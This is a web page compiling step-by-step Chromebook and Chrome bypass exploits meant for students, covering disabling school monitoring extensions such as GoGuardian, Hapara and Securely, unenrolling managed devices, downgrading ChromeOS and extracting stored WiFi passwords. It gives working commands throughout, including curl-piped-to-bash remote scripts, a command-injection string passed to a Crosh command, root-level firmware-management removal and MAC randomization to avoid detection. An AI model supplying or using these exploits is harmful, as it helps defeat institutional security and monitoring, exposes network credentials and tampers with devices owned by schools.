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This page is for Google Chrome/Chrome OS bypasses
For Windows exploits, see Bypasser’s Windowskit
Most web-based exploits will work on other Chromium based browsers

Table of Contents Alphabetic
App Diagnose WiFi Bypass
Browser Action Crasher
GoGuardian GoAway
Hapara Focus Session Bypass



Swamp Launcher
URL Unblocker
Admin Lock Bypass
Blobe BM
Car Axle Client
Flag Method
Extension Launcher
Search Filter Bypass
Screwdriver Unfog
Source View
Wi-Password Export
OP Crosh

proxy; Alphabetic

proxy moment
Opens a proxy tab with about:blank cloaking.
Web-based exploit.

1: Make a bookmarklet with the link from xlak.github.io/alphabetic/ & run it.
2: Print the page (Ctrl+P), then cancel & click “try again”. A proxy tab will open.

os; App Diagnose WiFi Bypass

Requires an app
a p p.
Chrome OS-based exploit.

1: Disable WiFi.
2: Click "Sign in as Existing User".
3: Hold esc & click any app.
4: Click "Add WiFi" & click any WiFi.
5: Click "Diagnose" & go to WiFi.
6: Click "Open in Settings", then close it.
7: Repeat step 2.

proxy;bookmarklet;web; Browser Action Crasher

proxy moment
Opens a proxy tab with about:blank cloaking.
Web-based exploit.

1: Make a bookmarklet with the link from xlak.github.io/alphabetic/ & run it.
2: Print the page (Ctrl+P), then cancel & click “try again”. A proxy tab will open.

web; Buypass

Only lasts for 3 minutes.
Bypasses extensions for 3 minutes.
Web-based exploit.

1: Go to any of these links:

web; cauDNS

Requires chrome://network#state
Disables extensions.
Web-based exploit.

1: Go here & follow the instructions there.

web;devtools; Chaos

Requires Devtools.
Confuses 1 of 3 extensions, bypassing Hapara Highlights & Hapara FIlter.
Web-based exploit.

1: Get the code from xlak.github.io/chaos/ & paste it in a new tab.
2: Inspect the page that loads.
3: Click on “Console” at the top & paste the script in.
4: When an inspect window pops up, paste the script in again.

os;powerwash; Corkey

Requires powerwash.
Your extensions get corrupted & don't work.
Chrome OS-based exploit.

1: Enter recovery page (Esc+Refresh+Power) or powerwash.
2: Log into your Chromebook & immediately turn off WiFi, then perform an instant restart (refresh+power).
3: Log back in & look for an option to log in as an existing user.
4: Go to chrome://extensions & turn on Wifi.
5: Wait for your school’s blocking extension to appear. As soon as it does, turn off Wifi & restart quickly.
6: Log back in, go back to extensions, & wait. If it says your blocking extension could be corrupted or doesn't appear at all, then it worked.

web; Dextensify

Memory leak unavoidable.
Disables extension with a memory leak.
Web-based exploit.

1: Go to chrome://extensions.
2: In a new tab, go to the settings page of the extension you want to disable.
3: In another tab, go here & click the “freeze extension button”.
4: Immediately switch back to chrome://extensions & spam the “allow access to file URLs” for a few seconds.
5: The extension is now disabled. You need to flip the switch a few times every couple of minutes, & you may need to reopen the Dextensify page every once in a while to prevent an unavoidable memory leak from crashing the system.

web;goguardian; GoGuardian GoAway

GoGuardian exclusive.
Disables GoGuardian.
Web-based exploit.

1: Go *{display:none}"}]"> here.
2: Reload the page.
3: If you are left on an error screen, go to chrome://restart.

tablimit;goguardian; GuardianTabCrash

Requires tab limit.
Crashes the admin's ability to remove tabs, though they can still see your screen.
Web-based exploit.

1: Create a bookmarklet with this code.
2: Spam click the bookmarklet while holding Ctrl.
3: If you’re asked to close the page, click no & prevent the page from making additional dialogues.

web;bookmarklet;hapara; Hapara Focus Session Bypass

Requires data: links.
Bypasses Hapara's Focus Session.
Web-based exploit.

1: Create a bookmarklet with this full screen iframe "> code.
2: During a focus session, run the bookmarklet.

v112;os; Killcurly

Patched on Chrome OS 112+
Patched on Chrome OS 112+
Chrome OS-based exploit.

1: Go to chrome://settings/signOut.
2: Press the big blue button.
3: Go to chrome://restart.
4: Add your school account back.

v106;web;bookmarklet; Ingot

Patched on Chrome OS 106+
A menu to disable extensions & enable extension Dev Mode. The successor UI to LTBEEF.
Web-based exploit.

1: Make a bookmarklet with this code.
2: Go to https://chrome.google.com/webstorex & run the bookmarklet.

securely;web; INSECURELY

Patched on Securely versions above 2.98.55
A toggle that kills Securely using black magic.
Web-based exploit.

1: Go here & flip the switch.

hapara;v111;web;bookmarklet; LoMoH

Doesn’t work with Hapara Highlights & Read&Write; patched on Chrome OS 111+
Uses locked mode to disable extensions. Formerly called Locked Mode Hack.
Web-based exploit.

1: Create a bookmarklet with this code & run it.


Methods using (B) & (C) are patched on Chrome OS 115+
Crashes an extension's manifest file.
Web-based exploit.

Note: LTMEAT disables all extensions, not just your blocker.
Template URL: chrome-extension://ID/manifest.json
Extension IDs (Chrome):

If your blocker ID isn’t on this list, go to the extension page & copy the character string in the URL.

1: Take the Template URL & replace "ID" with the extension ID. This is the extension's manifest page.
2: Go to the extension’s manifest page & bookmark it (A), as well as chrome://kill (B) & chrome://hang (C).
3: While on (A), click on (B).
4: Instantly start spamming (C) & reload.

Switch Method 1: While on (A), click on (B).
2: Duplicate the tab.
3: Go to the extension’s settings page.
4: Flip the "Allow access to file URLs" switch.

Chat Method 1: Wait until your teacher opens the chat window.
2: Spam X until it stops opening.
3: Flip the “Allow access to file URLs” switch.

Temporary Method 1: Create a new bookmark folder (spam.js) & inside that folder, make 38 bookmarks of the page chrome-extension://id/background.js (you can do this easily with the bookmark manager).
2: Go to chrome://settings/performance & turn memory saver off. Under “Keep these sites always active”, add chrome-extension://id/background.js.
3: On a new tab, right click (spam.js) & click “open all (38)”. Repeat this step, then duplicate the rightmost page & go to your blocker’s extension page..
4: Flip the “Allow access to file URLs” switch & go to the leftmost tab. Right click it & select “Close tabs to the right”. Keep the remaining background.js tab open.

Skid Method 1: Go to (A) & click on (C).
2: Duplicate the tab (right click on it & click “duplicate”).
3: Go to your blocker’s extension page & flip the “Allow access to file URLs” switch.

WiFi Method 1: Go to your blocker's extension page.
2: Disable WiFi.
3: Spam the “Allow access to file URLs” switch.
4: Enable WiFi.
5: Spam pin your extension.

106;web;bookmarklet; Point-Blank

Might be patched on Chrome OS 106+
Allows you to execute scripts on the extensions page, as well as hard & soft disable extensions.
Web-based exploit.

1: Create a bookmarklet with the code from here.
2: Go to one of these pages:
3: Click on the blue link & run the bookmarklet in the newly opened tab.

bookmarklet;web; Quickview

Requires bookmarklets
Loads pages without extensions.
Web-based exploit.

1: Create a bookmarklet by dragging the box that says “Quickview Launcher” from here into the Bookmarks Bar.
2: On that same page, double click the opener.
3: On the newly opened tab, run the bookmarklet.

flags;web; Sidetracked

Requires flag access; only works on Chrome OS 106+
Uses the unblocked sidebar to browse the web.
Web-based exploit; Chrome OS exclusive.

1: Go to chrome://flags#search-web-in-side-panel & enable it, then restart.
2: Open the side panel & select “google.com” from the drop own list.

kiosk; SKIOVOX

Requires a kiosk app; Most methods patched on version 119
Opens a window inside of a kiosk app, which has different permissions & extensions.
Chrome OS-based exploit.

1: In the login screen, turn off your WiFi.
2: If you have a password, type it in but don’t press enter.
3: Click on a kiosk app & press Alt+Shift+S instantly.
4: Wait until you get a “network unavailable screen”.
5: On the toolbar, click accessibility & then the ?.
If you see a “back” button proceed to method A (steps 6-7). Otherwise go to method B (steps 8-10) or method C (11-13).

Method A:
6: Click “add other WiFi network” & immediately press Esc twice & Enter. If you get a screen saying “multi sign-in is disab;ed”, press Esc to bypass it.
7: There may be an open window belonging to your school profile, you can close it. In the window behind it that has no extensions, click the 3 dots & then click “new window”. Use this window instead. Go to steps 14+.

Method B:
8: Press the “diagnose” button.
9: Just click “add other WiFi network”. This is inconsistent, try a few times with a few apps or use steps 11-13.
10: Click Wi-Fi, then the settings link. Close this window to reveal a Chrome window. Go to steps 14+.

Method C:
11: Just click “add other WiFi network”.
12: Turn on text-to-speech (Ctrl+Alt+Z). Hold the Search key & press O, then T.
13: Click “resources” & one of the 3 links to open Chrome. Once your browser is open, you can turn text to speech off. Go to steps 14+.
14: This exploit has some problems that can be fixed by the Skiovox Helper. A ZIP file of the extension is available on the GitHub page as well as here.
15: Go to chrome://extensions & enable extension Dev Mode. Click “load unpacked” & in the select a file menu, right click the ZIP file you downloaded earlier, & click “extract all”. Select the newly extractedfolder to install the extension.
Other notes:
Problems without Skiovox Helper: The main difference between the results of method A (steps 6-7) than method B (8-10) or method C (11-13) is method A can open multiple windows, while the others can’t.
If your screen keeps falling asleep every 5 seconds, try a different kiosk app.
Your files, bookmarks, & history won’t transfer over to the exploit & vice versa.
To exit the exploit, either hold down your power button & sign out or type chrome://quit in a new tab.

Unpatched Method 1: Do the main methods steps 1-4.
2: Click the cog in the brightness settings instead.
3: Click on one of the links in Chromevox's Resources tab (Ctrl+Alt+Z), then disable it.
4: Click "Sign in as existing user" & login. If you don't see this, try a different kiosk app.
5: Press Esc on the "Multi user sign in disabled on this Chromebook" screen.
6: Turn on WiFi & open a new window.
7: Go to main method steps 14+.
Note that any Incognito window is still monitored by your school.

web;extensionaccess; SOT

Requires extension access.
Uses OneTab & European witch magic to unblock websites.
Web-based exploit.

1: Download the OneTab extension.
2: Click the "import" button in the extension's settings tab.
3: Add the URL you wish to visit ~100 times, then click "import".
4: Spam click the top link, then either spam Esc on one of the opened tabs or wait for one to load on an about:blank page.

os; SWAB

Not finished
Access Google on the sign in screen.
Chrome OS-based exploit

1: Sign out.
2: If "Network Not Available" appears, click "Sign in with existing user".
3: Click "back".
4: TBF.

os;proxy;dnssettings; Swamp Launcher

Requires access to DNS settings
Connects you to a proxy server.
Chrome OS-based exploit.

1: Open the DNS settings.
2: Select "custom name servers" & set all of the boxes to
3: Wait 5 seconds, then change them to
4: In Google, go here.
5: Reload the page (Ctrl+Shift+R), then go here on the same tab.
6: Click on the big red triangle in the middle of the page & type "thisisunsafe". If you fail, reload the page & repeat this step.
7: Repeat step one & select "automatic name servers".

iboss;blocksi;web;bookmarklet; uBoss

Exclusive to iBoss & Blocksi
Tampers with iBoss.
Web-based exploit.

1: Create a bookmarklet with this {data.text().then(e=>{eval(e)})})`) && close();">code.
2: Go to one of these URLs: 3: Run the code & follow the instructions.

web; URL Unblocker

Requires editing to change website. >br> An unblocked alternative link.
Web-based exploit.

1: Take the URL of the site you want to visit & replace "URL" at the end of this.
2: Go to the URL.


screwdriver;hardware; Admin Lock Bypass

Requires screwdriver
Removes the admin lock.
Hardware-based exploit.

1: Turn your Chromebook off.
2: Unscrew the back cover.
3: Unplug the power cord connecting the battery & motherboard.
4: Hold the power button for 30 seconds.
5: Plug the power cord back in & screw the back cover on (or just leave it off you fucking psycho).

bookmarklet; Blank3r

Allows you to run bookmarklets on privileged pages.
Web-based exploit.

1: Make a bookmarklet with this {ids.forEach((id)=> opener.chrome.developerPrivate.updateExtensionConfiguration({extensionId: id, fileAccess: shim}));shim = !shim;}, 145);."> code.
2: Go to chrome://extensions & click on an extension.
3: Click “view in Chrome Web Store” & spam escape. If it loads into a blank screen, run the bookmarklet.
4: Keep this tab open.

web;bookmarklet; Blobe BM

Not compatable with every bookmarklet by design
Runs bookmarklets.
Web-based exploit.

1: Go here & follow the instructions.

web; BlobBypass

Requires BlobWiFi
Removes bypasses blockings.
Web-based exploit.

1: Use BlobWifi & go here.

web;network; BlobWiFi

Requires chrome://network
Removes network level blocking.
Web-based exploit.

1: Go to chrome://network#state.
2: Find the managed WiFi under "Favorite Networks".
3: Click the "+" & copy all the text.
4: Go here & paste the test into the bar, then click "Download".
5: Go to chrome://network#general & import the ONC file.

web;bookmarklet; ByeBlocker

Requires bookmarklets
Unblocked websites.
Web-based exploit.

1: Create a bookmarklet with this code & run it.

bookmarklet; Car Axle Client

Requires bookmarklets.
A menu with games, exploits, & bookmarklets.
Web-based exploit.

1: Make a bookmark with the code from here & run it on any page.

web;network; CAUB

Has to be done for each WiFI network; Chrome OS version 85+ required
Prevents your Chromebook from automatically updating.
Web-based exploit.

1: Go to chrome://network#state & scroll to the bottom.
2: Click the "+" by the name of the WiFi network.
3: Copy the whole page (Ctrl+A then Ctrl+C).
4: Go to caub.glitch.me & paste it into the text box.
5: Click "generate onc" & download the file.
6: Go to chrome://network#general & import the onc file.

Flag Method

Requires chrome://flags access
Chrome OS-based exploit.

1: Go to chrome://flags#show-metered-toggle & enable it.
2: Open Settings & go to Network >> Your WiFi >> Advanced >> Show metered toggle & turn it on.

os;powerwash; CRSH2TTY

N/A :0
Unenrolls your Chromebook, removing ALL restrictions. Works on every Chromebook.
Chrome OS-based exploit.

1: Powerwash on the login screen (Ctrl+Shift+Alt+R).
2: Proceed through setup.
3: When it starts to enroll, wait 1 second then restart (Power+Refresh)
4: When it starts to enroll again, wait 1 second then enter Recovery Mode (Esc+Refresh+Power) then power off.
5: Leave it off for at least 15 hours.
6: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.

Now that you're unenrolled, you won't have any kiosk apps. In order to get them back, you'll have to temporarily re-enroll your Chromebook.

This exploit was discovered by kelpseastem & Entrpix on GitHub.

v120;externalpc;externalstorage; Cryptosmite

Requires a storage device, another PC; patched on Chrome OS 120+
Unenrolls your Chromebook, removing ALL restrictions.
Chrome OS-based exploit.

1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 0, 1, or 2 your Chromebook is supported.
3: Downgrade to 118. If you're on a version before 118, stay on it.
4: Download an injected RMA Shim from here.
5: Flash the injected RMA Shim onto a USB device.
6: Enter Dev Mode (Ctrl+D).
7: Reenter Recovery Mode & plug in the storage device.
8: Run cryptosmite.sh in the injected shim.
9: In the "edit stateful bash" screen's bash prompt, run "tar -xvf /mnt/shim_stateful/stateful.tar.xz -C /mnt/stateful" & then "exit". The system will reboot into Verified Mode.
10: Click "Ok" in the oobe screen.
11: At the "Who would you like to add to this Chromebook?" screen, enable Dev Mode.

You can skip the wait by entering Recovery Mode & booting into the shim on the "Dev Mode is enabled" screen, then selecting the bash shell & running "mkfs.ext4 /dev/mmcblk0p1 -F", "mount -0 loop, rw /dev/mmcblk0p1 /tmp", "touch /tmp/.developer_mode", "umount /tmp && sync" & "Reboot". Add this as a bash script so you don't have to run these commands every time. On "enrollment" branch shims, this script is already included.

12: After enabling Dev Mode, press Ctrl+Alt+F2 quickly after you boot. 13: Type "Root", "vpd -i RW_VPD -s check_enrollment=0", & "cryptohome --action+remove_firmware_management_parameters". If you don't get the timing right, powerwash & try again.

After unenrolling, you can use KVS, which allows for use of newer versions of Chrome OS & more exploits.

extensionaccess;os;recoverymode;externalstorage Downgration

Requires storage device; extension access required; Mostly Limited
Downgrade your Chromebook.
Chrome OS-based exploit.

1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 0 or 1, your Chromebook can downgrade to any version. Otherwise, it's limited.

Minimum versions:

0/1: N/A

2: 112

3: 120 (121 on some boards)

4: 125

3: Go to chrome://version & check your board (under platform).
4: Go to chrome100.dev & find your board (use Ctrl+F) or find the bins here.
5: Download the version of Chrome OS you want.
6: Install the Chromebook Recovery Utility extension & run it.
7: Plug in the storage device & follow the instructions.
8: On your Chromebook, enter Recovery Mode (Esc+Reload+Power) & follow the prompts.
9: Skip the "Checking for Updates" screen by pressing Ctrl+Shift+E.

os;recoverymode;externalstorage; E-Halcyon

Requires a storage device; data doesn't save; patched on Kernver 4
Boots into an unenrolled Chrome OS environment.
Chrome OS-based exploit.

1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 4, your Chromebook is unsupported.
3: Unenroll your Chromebook.
4: Download a Chrome OS version 107 bin from chrome100.dev or from here.

A: Open a terminal & run "git clone https://github.com/MercuryWorkshop/RecoMod", "cd RecoMod", "chmod +x recomod.sh", & "sudo ./recomod.sh -i /path/to/recovery/image.bin --halcyon --rw_legacy".

5: Flash the bin file onto a storage device.
6: Enter Recovery Mode (Esc+Refresh+Power) & plug in the storage device.
7: Spam E until you get a 5 minute wait sequence, then spam E again near the end of it.
8: Navigate to "activate halycon enviroment" & press enter, then navigate to "install halycon semi-tethered". Navigate back to "activate halycon envirement" & select "Boot halycon semi-tethered".

You can no longer boot Chrome OS normally, & will have to use the storage device every time.

web;bookmarklet; Extension Launcher

Doesn’t work with blocklist/banlist
Installs an extension without using the webstore.
Web-based exploit.

1: Make a bookmarklet with the code from here.
2: Go here & run the bookmarklet.
3: Find an extension you want to download.
4: Right-click the image to the left of the title & select "Copy image address". Paste the image address into the first bar.
5: Type the name of the extension into the second bar.
6: Copy the extension ID (string of random letters in the address bar). Paste it into the third bar.
7: Click "Download".

Visit the Extension Information page for information on some extensions.

os;recoverymode; KVS

Only works on unenrolled Chromebooks; requires a storage device; patched on Kernver 4
Switches your kernver.
Chrome OS-based exploit.

1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 4, your Chromebook is unsupported.
3: Download a KVS bin from here.
4: Flash it onto a storage device.
5: Enter Dev Mode.
6: Reenter Recovery Mode.
7: Follow the instructions on-screen.

powerwash;os; Revertion

Requires powerwash; untested
Reverts Chrome OS back to its previous version.
Chrome OS-based exploit.

1: Powerwash your Chromebook.
2: On the OOBE screen, press Ctrl+Shift+Alt+R twice.
3: Click "Powerwash & Revert".

web; Search Filter Bypass

doesn't do shit
Works around the set blocked pages.
Web-based "exploit".

1: Type what you want to search in the address bar & add enough bullshit, then press enter.

externalpc;externalstorage;os; SH1MMER
SH1MMER Legacy

Requires 1 storage device, another PC; no UI; patched on Kernver 4
Unenrolls your Chromebook, removing ALL restrictions.
Chrome OS-based exploit.

1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 4, your Chromebook is unsupported.
3: Find your Chromebook’s board name by going to chrome://version. It will be behind “stable-channel”.
4: Download your board's RMA Shim at chrome100.dev & then inject the bin at Wax4Web or download an injected bin from here.
5: On another PC, download & run the Chromebook Recovery Utility extension or dd on Linux, using a local image.
6: Enter Recovery Mode (Esc+Refresh+Power when booting), then press Ctrl+D & then enter.
7: Reenter Recovery Mode, then plug your shimmed storage medium into your Chromebook.
8: Play some Tetris. This is legally required.
9: Press "S" for Cyrptosmite. The decryption key is "Info-58-immense!NickName_Arabia-710".
10: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.

SH1MMER Modern

Requires 1 storage device, another PC; incompatible with Hanna/Coral boards; patched on Kernver 4
Unenrolls your Chromebook, removing ALL restrictions.
Chrome OS-based exploit.

1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 4, your Chromebook is unsupported.
3: Find your Chromebook’s board name by going to chrome://version. It will be behind “stable-channel”.
4: Download your board's RMA Shim at chrome100.dev & then inject the bin at the SH1MMER Web Builder or download an injected bin from here.
5: On another PC, download & run the Chromebook Recovery Utility extension or dd on Linux, using a local image.
6: Enter Recovery Mode (Esc+Refresh+Power when booting), then press Ctrl+D & then enter.
7: Reenter Recovery Mode, then plug your shimmed storage medium into your Chromebook.
8: Navigate the UI & select what option you want.
9: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.

The fog...
Google has "patched" SH1MMER Modern on Chromebooks that have been on version 112+. However, there are extra steps to get it to work properly, as seen below.

Screwdriver Unfog

Requires screwdriver; Dev Mode; Chromebook on version 113 or lower.

1: Use the Admin Lock Bypass above, but don't insert the battery.
2: Enter Dev Mode & boot into SH1MMER.
3: Go into Bash Shell by using "Open Bash", then run "/usr/share/vboot/bin/set_gbb_flags.sh 0x8090". After using this command, DON'T use "Reset GBB Flags".
4: Exit SH1MMER & turn off your Chromebook. Unplug the charger, reconnect the battery, & then reconnect the charger.
5: Enter Dev Mode, then powerwash the Chromebook (Ctrl+Alt+Shift+R), then immediately enter the Chrome OS shell with Ctrl+Alt+F2+Enter.
6: Log into the user as root, then run "tpm_manager_client take_ownership" & "cryptohome --action=remove_firmware_management_parameters". If it fails, downgrade to version 110 or use E-Halycon instead.
7: Exit with Ctrl+Alt+F1+Backspace, then powerwash again. If you want to change version, continue.
8: Repeat steps 1-3, running these commands instead: "/usr/share/vboot/bin/set_gbb_flags.sh 0x8090", "tpm_manager_client take_ownership", & "chromeos-tpm-recovery". If it doesn't work, run "flashrom --wp-disable" & restart.
9: Repeat step 4. You can now install any Chrome OS version. If you get an error again, repeat steps 8-9.

Now that you're unenrolled, you won't have any kiosk apps. In order to get them back, you'll have to temporarily re-enroll your Chromebook.
1: Enter Dev Mode, then press Esc+Power+Reload then Ctrl+D & then enter.
2: If you get a screen that says "You're already in Dev Mode", skip it by pressing Ctrl+D again.
3: Powerwash your Chromebook (Ctrl+Alt+Shift+R). If you just entered Dev Mode, you can skip this step.
4: Once you enter the WiFI password, click the "Enterprise Enrollment" button & sign in with your school account.
5: Once you're on the normal district login screen, press Ctrl+Alt+F2.
6: Type "root" as the login & "test0000" as the password if needed.
7: Run the command "vpd -i RW_VPD -s check_enrollment=0", then press Ctrl+Alt+F1.
8: Open the kiosk app.
9: Once you're done, reboot your computer with Power+Refresh, then follow the instructions.

os;externalstorage;externalpc;x86;devmode; Shimboot

Requires storage device, another PC, x86-based Chromebook; Dev Mode required (see here)
Allows you to boot into Linux or Chrome OS without modifying your Chromebook.
Chrome OS-based exploit.

1: Find your Chromebook’s board name by going to chrome://version, it will be behind “stable-channel”.
2: Get your Chromebook’s RMA shim from chrome100.dev or download a prebuilt one here.

A: Clone the https://github.com/ading2210/shimboot repository.

B: Run "mkdir -p data/rootfs", "sudo ./build_rootfs.sh data/rootfs bookworm", "sudo ./patch_rootfs.sh path_to_shim path_to_reco data/rootfs", & "sudo ./build.sh image.bin path_to_shim data/rootfs".

3: Flash the shimboot image to a USB drive or SD card. Use the Chromebook Recovery Utility or dd if you're on Linux.
4: Enable Dev Mode & then Recovery Mode (Esc+Refresh+Power when booting).
5: Boot into Debian & log in. The default is user/user.
6: Expand the rootfs partition so that it fills up the entire disk by running "sudo growpart /dev/sdX 4" (replacing sdX with the block device corresponding to your disk) to expand the partition, then run "sudo resize2fs /dev/sdX4" to expand the filesystem.

devmode;web; Skebstore

Requires extension Developer Mode
An extension that allows you to download other extension.
Web-based exploit.

1: Download the folder from the GitHub page or here.
2: Go to chrome://extensions & enable extension Developer Mode.
3: Click "Load unpacked" & select the folder (unzip it if needed).
4: Click the extension to go to the Skebstore install page.
5: Insert the extension you want to download's ID & download it.

web;snapandread; Snap&Run

Snap&Read exclusive
Unblocks bookmarklets.
Web-based exploit.

1: Sign in to an active account.


2: Enable the Snap&Read toolbar.
3: Enter any text into the outline topic's editable text area.
4: Click the bullet point of the topic.
5: Click the "Link to Source" option.
6: Click the "+" button at the bottom right.
7: Switch to the website tab.
8: In the Article/Page title input field, enter the name of your chosen bookmarklet.

-Be sure to add this bookmarklet executor.

9: Click "Save" & switch to the outline tab.
10: In the Snap&Read toolbar, click the "Hide Outlines" button.


11: In the Snap&Read toolbar, click the "Show Outlines" button.
12: In your created outline, click the link separated by parenthesis that contains the bookmarklet.
13: Click the "Hide Outlines" button.

web;sourcecodeview; Source View

Requires the ability to view a page’s source code
Reconstructs a web page from its source code.
Web-based "exploit".

1: Go to a website & view its source code with Ctrl+U or by using the View Source bookmarklet.
2: Copy everything from the newly opened tab & paste it in a site like this.

devmode;usb; USBoot

Requires Dev Mode
Allows you to boot from a USB device.

1: Enabble Dev Mode (Esc+Power+Refresh).
2: After selecting "boot from internal disk", press Ctrl+Alt+F2.
3: Type "sudo crossystem dev_boot_usb=1".

Press "Ctrl+U" on the OS Verification screen to boot from USB.

ublockorigin;web; uRun

uBlock Origin exclusive
Unblocks bookmarklets. Updated version of uBlock Run.
Web-based exploit.

1: Go to uBlock Origin’s settings page & check the “I am an advanced user” box, then click on the small cog icon.
2: Find “userResourcesLocation unset" & change it to "https://inglan2.github.io/uRun/urun.js".
3: Go to the “My filters” tab & add a line with “*##+js(urun.js)”, then run the code on the current page (Ctrl+Alt+~).

Press "Ctrl+Shift+`" to open the menu, where you can run & create scripts. To add a script, click the ➕ button & enter the code without the "javascript:" part.

os;web; Wi-Password Export

Only works with connected networks; only works on Chrome OS
Gives the passwords to connected WiFi networks from a net log file.
Web-based exploit.

1: Go to chrome://net-export.
2: Select "Include raw bytes" & start logging to disk.
3: Go to chrome://policy.
4: Click "Reload policies".
5: Go back to chrome://net-export & stop logging.
6: Go here or open this HTML file & upload the log file.


devmode; CroshFi

Requires Devmode
Gives you the password to a WiFi network.

1: Enter Devmode & open Crosh (Ctrl+Alt+T).
2: Run the commands "shell", "sudo su", & "cd home/root", then type "ls" & copy the middle code string.
3: Run the command "cd [code string here]" & type "ls" again. Enter "more shill/shill.profile".
4: Enter "more shill/shill.profile".
5: Eventually, you’ll see a username appear. Scroll up in Crosh until you see the SSID (network ID). Copy the passphrase code (below the SSID & after the colon).
6: Run the command "echo [passphrase] | tr ‘!-~’ ‘P-~!-O’."

v101; De-roll

Patched on Chrome OS 101+
Unenrolls your Chromebook using Crosh.

1: Open Crosh (Ctrl+Alt+T).
2: Run "set_cellular_ppp \';dbus-send${IFS}--system${IFS}--print-reply${IFS}--dest=org.chromium.SessionManager${IFS}/org/chromium/SessionManager${IFS}org.chromium.SessionManagerInterface.ClearForcedReEnrollmentVpd;exit;\'"
3: Powerwash your Chromebook (Ctrl+Alt+Shift+R).
4: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.

1: Open a bash shell & run "sudo -i", "vpd -i RW_VPD -s check_enrollment=1", "echo "fast safe" > /mnt/stateful_partition/factory_install_reset", & "reboot".

unenrollment;v117; Fakemurk

Requires unenrollment; patched on version 117+; patched on Kernver 4
Allows you to have Dev Mode permissions while in Safe Mode.

1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 4, your Chromebook is unsupported.
3: Unenroll your device.
4: Enter Dev Mode.
5: Install RW_LEGACY bios from here.
6: Open Crosh (Ctrl+Alt+T) & run the commands “sudo -i” & “bash <(curl -SLk https://github.com/MercuryWorkshop/fakemurk/releases/latest/download/fakemurk.sh)”. Follow everything it says. If you get an error about a filesystem being readonly, run “fsck -f $(rootdev)” & reboot.
7: Enter Devmode with Ctrl+D, then press Refresh+Power & then press space on the OS verification screen. You will be on a “Chrome OS is missing or damaged” screen. Press Esc+Refresh+Power then Ctrl+D & enter. When you get back to the OS verification screen, press Ctrl+D to boot.

Don't use the sign out button as it will freeze your computer. Use Power+Refresh or Reboot in Crosh instead.
Mush will be installed with Fakemurk.
While Fakemurk is installed, you can make a folder called “disable-extensions” to disable extensions.

powerwash; OP Crosh

Requires powerwash
Deletes the extensions.

1: Open Crosh (Ctrl+Alt+T) & run the “vmc” command. If you get a list of subcommands, then continue.
2: Powerwash then sign in & disable WiFi immediately.
3: Go to chrome://extensions & enable your internet, then immediately disable it when an extension is installed.
4: Open Crosh & for each extension you want to disable, run the command “vmc create-extra-disk --size 1 /home/chronos/user/Extensions/{extensionID}” or run "Open Crosh & type “vmc create-extra-disk --size 1 /home/chronos/user/Extensions”" to disable all.
5: Reenable WiFi.

devmode;os; Pollen

Requires Dev Mode
Changes your Chromebook's policy.
Chrome OS-based exploit.

1: Enter Dev Mode (Esc+Power+Refresh) & open Crosh (Ctrl+Alt+T).
2: Run the following commands: “shell”, “sudo su”, & “curl -Ls https://mercuryworkshop.github.io/Pollen/Pollen.sh | bash”.
3: If the policy doesn’t apply, press Alt+Vol Up+X.

Created by The Wagonization, consisting of JackWagon885
All credit goes to the respective owners. I only compile them in a list.
Fuck you Google